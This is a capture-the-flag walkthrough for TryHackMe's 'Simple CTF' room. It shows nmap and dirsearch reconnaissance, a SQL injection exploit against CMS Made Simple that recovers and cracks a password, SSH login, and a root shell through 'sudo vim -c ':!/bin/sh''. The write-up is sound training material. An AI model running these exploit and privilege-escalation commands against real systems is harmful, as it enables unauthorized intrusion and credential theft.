📝 TryHackMe. Walkthrough: Simple CTF
- The Site: TryHackMe
- Name room: Simple CTF
- Difficulty: Easy
How many services are running under port 1000?
$ nmap -A 10.10.203.52
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Answer: *
What is running on the higher port?
Answer: s**
What’s the CVE you’re using against the application?
Let’s try to brute the directories on the web server.
$ python3 dirsearch.py -u http://10.10.203.52/
...
[13:47:22] 200 - 929B - /robots.txt
[13:47:26] 301 - 313B - /simple -> http://10.10.203.52/simple/
In the directory /simple/ there is a website, the caption at the footer says that it runs on CMS Make Simple version 2.2.8.
This site is powered by CMS Made Simple version 2.2.8
Trying to find available exploits through searchsploit.
$ searchsploit 'cms made simple 2.2'
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authe | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
$ searchsploit -m 46635
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script text executable, ASCII text
SQLi is good for us.
Answer: CVE-2019-****
To what kind of vulnerability is the application vulnerable?
Answer: sq**
What’s the password?
$ python 46635.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.
$ python 46635.py -u http://10.10.203.52/simple/ --crack -w password-list-all.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
Where can you login with the details obtained?
With these credentials we can try to connect to SSH.
Answer: s*h
What’s the user flag?
Read the file in your home directory.
Answer: ***d **b, ke** u*!
Is there any other user in the home directory? What’s its name?
ls -la /home/
Answer: su****h
What can you leverage to spawn a privileged shell?
Let’s check what privileges we have for sudo.
$ sudo --list
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
Answer: **m
What’s the root flag?
Get a root shell through sudo.
sudo vim -c ':!/bin/sh'
And read the file with the flag in the /root/ directory.
Answer: W*** d***. **u **** ***